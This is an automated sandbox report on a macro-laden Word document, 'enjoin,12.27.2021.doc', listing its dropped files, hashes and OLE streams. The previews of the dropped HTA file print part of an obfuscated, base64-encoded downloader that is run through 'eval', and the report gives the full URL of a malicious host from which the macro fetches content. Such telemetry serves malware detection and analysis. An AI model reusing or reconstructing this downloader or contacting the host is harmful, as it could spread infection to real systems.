                patelboostg.comMoldova Republic of
                200019ALEXHOSTMDfalse

                General Information

                Joe Sandbox Version:34.0.0 Boulder Opal
                Analysis ID:546767
                Start date:31.12.2021
                Start time:12:47:58
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 5m 3s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:enjoin,12.27.2021.doc
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Run name:Without Instrumentation
                Number of analysed new started processes analysed:7
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal72.expl.winDOC@6/13@1/1
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .doc
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Found warning dialog
                • Click Ok
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                12:49:17API Interceptor26x Sleep call for process: explorer.exe modified
                12:49:19API Interceptor32x Sleep call for process: mshta.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASN

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vaci3[1].htm
                Process:C:\Windows\SysWOW64\mshta.exe
                File Type:HTML document, ASCII text
                Category:downloaded
                Size (bytes):204
                Entropy (8bit):5.1573981743615605
                Encrypted:false
                SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3fEjZKCezocKqD:J0+oxBeRmR9etdzRxfERez1T
                MD5:D3EB9513A9F2DD24ECDCC38FF33CA41B
                SHA1:37433C7BFDB800C601FCBA6F055BD01A87D26333
                SHA-256:56591A120BD1C7D012554BEFD923D1AC7BF015A53A36C2808766F74FBFDCEB64
                SHA-512:67960FEEC5EDA119383B9955DBD36550CE804EF1FD01F0E4D9AFC347068CA54BE4B89913AF2CC872E25C119318CBE3E137A4965E4A5A09231AFE960C1E2B844B
                Malicious:false
                Reputation:low
                IE Cache URL:http://patelboostg.com/frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qAhIQjrAaLKJeTLQnbCarASpMADNe9u19Kylnkoreo7/SjqMh4eEx0Hx9b4h5e2fMcQgeIbFT/kKeSzfUaenwSFB/ISkVIHedx0p/49280/SruwcI68Yb5pVaVqfvyOHztDsbEuhGxtlV6bpgPIFvGFQ277/7FkN9pAcaWDfFlGNBeuaqGed8iDibaWexT/GyAAzLRbFAU1XErrU1F/vaci3?page=V8BBaQuem65&page=XYvyd0Dcrg6fJYLGHRVWp7s1tv&page=dvZwXcjcYCjBX8tPaALshiDAx85PEq&sid=10tOgWzOZj9xyAidNJAz3d9Ob0
                Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "vaci3" was not found on this server.</p>.</body></html>.
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{0EAFF200-D409-4B93-A1AA-8EC2D1EA50BF}.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):16384
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:CE338FE6899778AACFC28414F2D9498B
                SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{32ACE746-D13A-408F-AE74-06CF9FEDB16D}.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):1024
                Entropy (8bit):0.05390218305374581
                Encrypted:false
                SSDEEP:3:ol3lYdn:4Wn
                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                Malicious:false
                Reputation:high, very likely benign file
                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Temp\~DF9A2CC38F101A7279.TMP
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                Malicious:false
                Reputation:high, very likely benign file
                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\My Documents.LNK
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Fri Dec 31 19:49:16 2021, atime=Fri Dec 31 19:49:16 2021, length=16384, window=hide
                Category:dropped
                Size (bytes):895
                Entropy (8bit):4.489866809978452
                Encrypted:false
                SSDEEP:24:85Y3Rb/XTTcU3xKshemtl2Y3qYZVNZVu/:85Y3Rb/XTAU8e9twY9u
                MD5:28DFB4AE47F7B8AA4BC15AD0659981FD
                SHA1:E2E72F84340465FC6D4A8860C35B7A992E4B448F
                SHA-256:23FF02A1276523C4B394173B2D509468DFF29DD4634928DE7082CA21EE4615C1
                SHA-512:C24D1213F3A336EB9F1718EC850AFEEEE2C04429DFCA059556D2249A69F1317BB5E0B392673DBCC2B9C3764383D931FDD7FA764BB4905C8B6B2DA43D98B0EC16
                Malicious:false
                Preview: L..................F...........7G..Y. .....Y. ......@......................o....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.......1......S ...DOCUME~1..h......QK.X.S .*...[=..............>.....D.o.c.u.m.e.n.t.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.......k...............-...8...[............?J......C:\Users\..#...................\\562258\Users.user\Documents.......\.....\.....\.....\.....\.D.o.c.u.m.e.n.t.s.............m...............#.F..l.H.i.m...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......562258..........D_....3N...W...9n.[.*.......}EkD_....3N...W...9n.[.*.......}Ek....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\enjoin,12.27.2021.LNK
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:55 2021, mtime=Mon Aug 30 20:08:55 2021, atime=Fri Dec 31 19:49:12 2021, length=79360, window=hide
                Category:dropped
                Size (bytes):1049
                Entropy (8bit):4.507628337122616
                Encrypted:false
                SSDEEP:12:8wA0gXg/XAlCPCHaXjByB/AVtX+WQ0F7OahaQh4icvbi4W4VaQ3DtZ3YilMMEpxX:8xk/XTTc+b17vasremr4aADv3qYQd7Qy
                MD5:CDD02D874BC6B01C25C109C8384B736A
                SHA1:528886D45E0117EDD645906CCE0C9F1555602172
                SHA-256:D92B76A50B850F9E344EED6A4089804FBD5E7F2E3AD711F773900A9CC9A4E477
                SHA-512:0C2B94EA21A8EEA4CF1B28E95491CE12B79E7FC9C03D96C8C3D00850B621A38E4C947DF78C4E661B755D902AAAA671E56E422F80AB33E48E64105B7EE1F6BE0D
                Malicious:false
                Preview: L..................F.... ......=......=...........6...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1......S ...Desktop.d......QK.X.S .*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....t.2..6...S'. .ENJOIN~1.DOC..X.......S...S..*.........................e.n.j.o.i.n.,.1.2...2.7...2.0.2.1...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\562258\Users.user\Desktop\enjoin,12.27.2021.doc.,.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.e.n.j.o.i.n.,.1.2...2.7...2.0.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......562258..........D_....3N...W...9..g
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\i7Gigabyte.LNK
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 31 19:49:16 2021, mtime=Fri Dec 31 19:49:16 2021, atime=Fri Dec 31 19:49:16 2021, length=4060, window=hide
                Category:modified
                Size (bytes):1042
                Entropy (8bit):4.575754104270858
                Encrypted:false
                SSDEEP:24:8HRc/XTTc0ooKioDUA97emt70eM2Y3qYR7m:8HRc/XTA0ahUAR9t70eHYFm
                MD5:A6551AA851F17D2C186397BEFE5659BE
                SHA1:9CB24AE1311B7A9C464EE1031B0ABCF556F127CD
                SHA-256:697D8306857ADFADAAFB96D9FBF53AD19BDB88E7F5DAC59DA177EFB3569B9C65
                SHA-512:CA648714947847F00E9380C2423698A651C2B0632683DF38B7D4CDD8AB96FDDB197848C6441B3977AB32E479631E546EAAC71F668F5B6C833BD6788D4B4D3E4E
                Malicious:false
                Preview: L..................F.... ...Y. .....Y. ....._7Y..................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.......1......S)...DOCUME~1..h......QK.X.S).*...[=..............>.....D.o.c.u.m.e.n.t.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....f.2......S). .I7GIGA~1.HTA..J......S)..S).*.........................i.7.G.i.g.a.b.y.t.e...h.t.a.......z...............-...8...[............?J......C:\Users\..#...................\\562258\Users.user\Documents\i7Gigabyte.hta.'.....\.....\.....\.....\.....\.D.o.c.u.m.e.n.t.s.\.i.7.G.i.g.a.b.y.t.e...h.t.a.............m...............#.F..l.H.i.m...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......562258..........D_....3N...W...9..g.......
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):149
                Entropy (8bit):4.925765021076922
                Encrypted:false
                SSDEEP:3:bDuMJlYLfzX9UAlwcXAlWCUSvngculmX1UzX9UAlmxWHRqgculv:bCHFPAkqgf9ZRqgf1
                MD5:3BF4F1E7F23C02240D20AE24C8EF9AAA
                SHA1:C5C0FDD6C3D8D7A76D4C7E4FDE645A89E7D41533
                SHA-256:3A48146C4A0C943D845AE094F1FCAF679B005FD684BA0B38C0418313A63C23E8
                SHA-512:92C4058FE98FF941B850CB901D38997CECB98716C0A0664897C6D7F4AC21DC0F1641E3DDBCEB77134B1EF7BFA9E4A99130172E3B67D7825D16BD680F3D71D029
                Malicious:false
                Preview: [folders]..Templates.LNK=0..enjoin,12.27.2021.LNK=0..My Documents.LNK=0..i7Gigabyte.LNK=0..[doc]..enjoin,12.27.2021.LNK=0..[misc]..i7Gigabyte.LNK=0..
                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162
                Entropy (8bit):2.5038355507075254
                Encrypted:false
                SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                Malicious:false
                Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                C:\Users\user\Desktop\~$join,12.27.2021.doc
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162
                Entropy (8bit):2.5038355507075254
                Encrypted:false
                SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                Malicious:false
                Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                C:\Users\user\Documents\i7Gigabyte.hta (copy)
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                Category:dropped
                Size (bytes):4060
                Entropy (8bit):5.772579806586633
                Encrypted:false
                SSDEEP:96:gmubD4ZmjvpJN3IyP3NoEVxaOcR9+2xtIols/RWvyXqRATuh:gmywmjBrYA3OgBcRU2gjRRM
                MD5:FBDB7848F1D9945428C0101B75811195
                SHA1:FE31E65196E0844CD5858F893D44428AECE6A2B4
                SHA-256:AEC91C78C4DC06C5BCEA7B5020C38B003FC120153D51A3ADB4F32D8000A6326A
                SHA-512:D699D3A8123F7FCC09373F27F0A09015546ABE6BCFBEB8A75178B9EF0304F73C19BC0F27F51ED2B78A02A8CAEE89B5E268808E6C0AA981ED011FE03C573311A5
                Malicious:false
                Preview: <html><body><p id='processorRtx' style='font-color: #000'>eval</p><p id='rtxI7' style='font-color: #000'>fX17KWUoaGN0YWN9O2Vzb2xjLnh0Um9lZGlWZWxiYXQ7KTIgLCJncGouN0lldHliYWdpZ1xcY2lsYnVwXFxzcmVzdVxcOmMiKGVsaWZvdGV2YXMueHRSb2VkaVZlbGJhdDspeWRvYmVzbm9wc2VyLnJlcHVTcm9zc2Vjb3JQb2VkaXYoZXRpcncueHRSb2VkaVZlbGJhdDsxID0gZXB5dC54dFJvZWRpVmVsYmF0O25lcG8ueHRSb2VkaVZlbGJhdDspIm1hZXJ0cy5iZG9kYSIodGNlamJPWGV2aXRjQSB3ZW4gPSB4dFJvZWRpVmVsYmF0IHJhdnt5cnR7KTAwMiA9PSBzdXRhdHMucmVwdVNyb3NzZWNvclBvZWRpdihmaTspKGRuZXMucmVwdVNyb3NzZWNvclBvZWRpdjspZXNsYWYgLCIwYk85ZDN6QUpOZGlBeXg5alpPeldnT3QwMT1kaXMmcUVQNTh4QURpaHNMQWFQdDhYQmpDWWNqY1h3WnZkPWVnYXAmdnQxczdwV1ZSSEdMWUpmNmdyY0QwZHl2WVg9ZWdhcCY1Nm1ldVFhQkI4Vj1lZ2FwPzNpY2F2L0YxVXJyRVgxVUFGYlJMekFBeUcvVHhlV2FiaURpOGRlR3FhdWVCTkdsRmZEV2FjQXA5TmtGNy83NzJRRkd2RklQZ3BiNlZsdHhHaHVFYnNEdHpIT3l2ZnFWYVZwNWJZODZJY3d1clMvMDgyOTQvcDB4ZGVISVZrU0kvQkZTd25lYVVmelNlS2svVEZiSWVnUWNNZjJlNWg0Yjl4SDB4RWU0aE1xalMvN29lcm9rbmx5SzkxdTllTkRBTXBTQXJhQ2JuUUxUZUpLTGFBcmpRSWhBcS82eW5zVHBaNnZCWnd
                C:\Users\user\Documents\~$Gigabyte.hta
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162
                Entropy (8bit):2.5038355507075254
                Encrypted:false
                SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                Malicious:false
                Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                C:\Users\user\Documents\~WRD0000.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                Category:dropped
                Size (bytes):4060
                Entropy (8bit):5.772579806586633
                Encrypted:false
                SSDEEP:96:gmubD4ZmjvpJN3IyP3NoEVxaOcR9+2xtIols/RWvyXqRATuh:gmywmjBrYA3OgBcRU2gjRRM
                MD5:FBDB7848F1D9945428C0101B75811195
                SHA1:FE31E65196E0844CD5858F893D44428AECE6A2B4
                SHA-256:AEC91C78C4DC06C5BCEA7B5020C38B003FC120153D51A3ADB4F32D8000A6326A
                SHA-512:D699D3A8123F7FCC09373F27F0A09015546ABE6BCFBEB8A75178B9EF0304F73C19BC0F27F51ED2B78A02A8CAEE89B5E268808E6C0AA981ED011FE03C573311A5
                Malicious:false
                Preview: <html><body><p id='processorRtx' style='font-color: #000'>eval</p><p id='rtxI7' style='font-color: #000'>fX17KWUoaGN0YWN9O2Vzb2xjLnh0Um9lZGlWZWxiYXQ7KTIgLCJncGouN0lldHliYWdpZ1xcY2lsYnVwXFxzcmVzdVxcOmMiKGVsaWZvdGV2YXMueHRSb2VkaVZlbGJhdDspeWRvYmVzbm9wc2VyLnJlcHVTcm9zc2Vjb3JQb2VkaXYoZXRpcncueHRSb2VkaVZlbGJhdDsxID0gZXB5dC54dFJvZWRpVmVsYmF0O25lcG8ueHRSb2VkaVZlbGJhdDspIm1hZXJ0cy5iZG9kYSIodGNlamJPWGV2aXRjQSB3ZW4gPSB4dFJvZWRpVmVsYmF0IHJhdnt5cnR7KTAwMiA9PSBzdXRhdHMucmVwdVNyb3NzZWNvclBvZWRpdihmaTspKGRuZXMucmVwdVNyb3NzZWNvclBvZWRpdjspZXNsYWYgLCIwYk85ZDN6QUpOZGlBeXg5alpPeldnT3QwMT1kaXMmcUVQNTh4QURpaHNMQWFQdDhYQmpDWWNqY1h3WnZkPWVnYXAmdnQxczdwV1ZSSEdMWUpmNmdyY0QwZHl2WVg9ZWdhcCY1Nm1ldVFhQkI4Vj1lZ2FwPzNpY2F2L0YxVXJyRVgxVUFGYlJMekFBeUcvVHhlV2FiaURpOGRlR3FhdWVCTkdsRmZEV2FjQXA5TmtGNy83NzJRRkd2RklQZ3BiNlZsdHhHaHVFYnNEdHpIT3l2ZnFWYVZwNWJZODZJY3d1clMvMDgyOTQvcDB4ZGVISVZrU0kvQkZTd25lYVVmelNlS2svVEZiSWVnUWNNZjJlNWg0Yjl4SDB4RWU0aE1xalMvN29lcm9rbmx5SzkxdTllTkRBTXBTQXJhQ2JuUUxUZUpLTGFBcmpRSWhBcS82eW5zVHBaNnZCWnd

                Static File Info

                General

                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Comments: ta, Template: Normal, Last Saved By: Windows, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 27 11:02:00 2021, Last Saved Time/Date: Mon Dec 27 11:02:00 2021, Number of Pages: 1, Number of Words: 116, Number of Characters: 16118, Security: 0
                Entropy (8bit):5.843747544208076
                TrID:
                • Microsoft Word document (32009/1) 54.23%
                • Microsoft Word document (old ver.) (19008/1) 32.20%
                • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                File name:enjoin,12.27.2021.doc
                File size:79360
                MD5:7044bd240219ec2f83b01c532e2ce5ba
                SHA1:745cdbc4a826c5960eef3f4a9aa307ff94e4b7fb
                SHA256:ecd84fa8d836d5057149b2b3a048d75004ca1a1377fcf2f5e67374af3a1161a0
                SHA512:8467fc9f63711c8fa460f1f35d42b6528c6e285799d9a19630696dd3a12e24799370eaa6d53e075e60d579a3b4ecef035cf62aac6a1bc96130b392c3931882ee
                SSDEEP:768:P/MMM1tMFur3Be1l3Jeq1awypEuqjuy+uqezc1GFZIdJ6jtQlQNBOTHxPIz/tZj8:Zja8IdPhW/jTEQMiebld4Kkd6t
                File Content Preview:........................>.......................|...........................{..................................................................................................................................................................................

                File Icon

                Icon Hash:e4eea2aaa4b4b4a4

                Static OLE Info

                General

                Document Type:OLE
                Number of OLE Files:1

                OLE File "enjoin,12.27.2021.doc"

                Indicators

                Has Summary Info:True
                Application Name:Microsoft Office Word
                Encrypted Document:False
                Contains Word Document Stream:True
                Contains Workbook/Book Stream:False
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:True

                Summary

                Code Page:1251
                Title:
                Subject:
                Author:
                Keywords:
                Comments:ta
                Template:Normal
                Last Saved By:Windows
                Revion Number:2
                Total Edit Time:0
                Create Time:2021-12-27 11:02:00
                Last Saved Time:2021-12-27 11:02:00
                Number of Pages:1
                Number of Words:116
                Number of Characters:16118
                Creating Application:Microsoft Office Word
                Security:0

                Document Summary

                Document Code Page:1251
                Category:explorer
                Number of Bytes:26624
                Number of Lines:65
                Number of Paragraphs:1
                Thumbnail Scaling Desired:False
                Manager:
                Company:ript.sh
                Contains Dirty Links:False
                Shared Document:False
                Changed Hyperlinks:False
                Application Version:1048576

                Streams with VBA

                VBA File Name: ThisDocument.cls, Stream Size: 2420
                General
                Stream Path:Macros/VBA/ThisDocument
                VBA File Name:ThisDocument.cls
                Stream Size:2420
                Data ASCII:. . . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . Y . $ N . . ! . . . . . . . . . . . . N . K . N . . 5 . . . . . . . . . . . . . . . . . . . . . B 4 . + : r , L . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . B 4 . + : r , L . . . . . . x . . . . . Y . $ N . . ! . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 06 00 01 00 00 54 05 00 00 e4 00 00 00 ea 01 00 00 82 05 00 00 90 05 00 00 a0 07 00 00 04 00 00 00 01 00 00 00 40 9d 90 12 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 d3 15 f5 98 59 c8 24 4e 9f 86 21 a3 de d2 ab eb 81 1c 87 c8 ad b2 15 4e 82 4b ba 4e ad 1e 35 87 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code
                VBA File Name: main.bas, Stream Size: 1103
                General
                Stream Path:Macros/VBA/main
                VBA File Name:main.bas
                Stream Size:1103
                Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 89 03 00 00 00 00 00 00 01 00 00 00 40 9d 65 e5 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code

                Streams

                Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                General
                Stream Path:\x1CompObj
                File Type:data
                Stream Size:114
                Entropy:4.42107393569
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 c4 ee ea f3 ec e5 ed f2 20 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                General
                Stream Path:\x5DocumentSummaryInformation
                File Type:data
                Stream Size:4096
                Entropy:0.337221095365
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . e x p l o r e r . . . . . . . . . . . . . . . . . . . . . . . . r i p t . s h . . . . . . h . . . . . . A . . . . . . . . . . .
                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 30 01 00 00 0f 00 00 00 01 00 00 00 80 00 00 00 02 00 00 00 88 00 00 00 0e 00 00 00 9c 00 00 00 0f 00 00 00 a8 00 00 00 04 00 00 00 b8 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 c8 00 00 00 11 00 00 00 d0 00 00 00 17 00 00 00 d8 00 00 00
                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                General
                Stream Path:\x5SummaryInformation
                File Type:data
                Stream Size:4096
                Entropy:0.475702379357
                Base64 Encoded:False
